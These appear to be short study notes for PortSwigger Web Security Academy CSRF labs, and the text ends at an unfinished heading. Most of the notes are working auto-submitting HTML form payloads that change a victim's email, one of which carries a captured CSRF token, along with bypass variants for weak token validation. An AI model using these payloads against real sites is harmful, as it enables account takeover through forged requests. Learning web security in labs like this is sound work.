CSRF vulnerability with no defenses

basic payload :

<html>
    <body>
        <form action="<https://0a2d00fa03c7c0ae81ff20f60097005a.web-security-academy.net/my-account/change-email>" method="POST">
            <input type="hidden" name="email" value="[email protected]" />
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>

CSRF where token validation depends on request method

if csrf token protection only on POST and not on GET

<form action="<https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email>">
    <input type="hidden" name="email" value="anything%40web-security-academy.net">
</form>
<script>
        document.forms[0].submit();
</script>

CSRF where token validation depends on token being present

the idea is just to remove the csrf token

use basic payload

<form method="POST" action="<https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email>">
    <input type="hidden" name="$param1name" value="$param1value">
</form>
<script>
    document.forms[0].submit();
</script>

CSRF where token is not tied to user session

if csrf is not linked to a particular user (get a csrf token from a droped request made by your account)

<html>
    <body>
        <form action="<https://0aa8002404769a84809817c100800030.web-security-academy.net/my-account/change-email>" method="POST">
            <input type="hidden" name="email" value="[email protected]" />
            <input type="hidden" name="csrf" value="1AKwjSNfFxD660gMUnKJwFU2NtjNCyL1" />
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>

CSRF where token is tied to non-session cookie

Here the server checks the CSRF token and a CSRF cookie token but none are strictly tied to the session. You can easily get both tokens and craft an attack payload :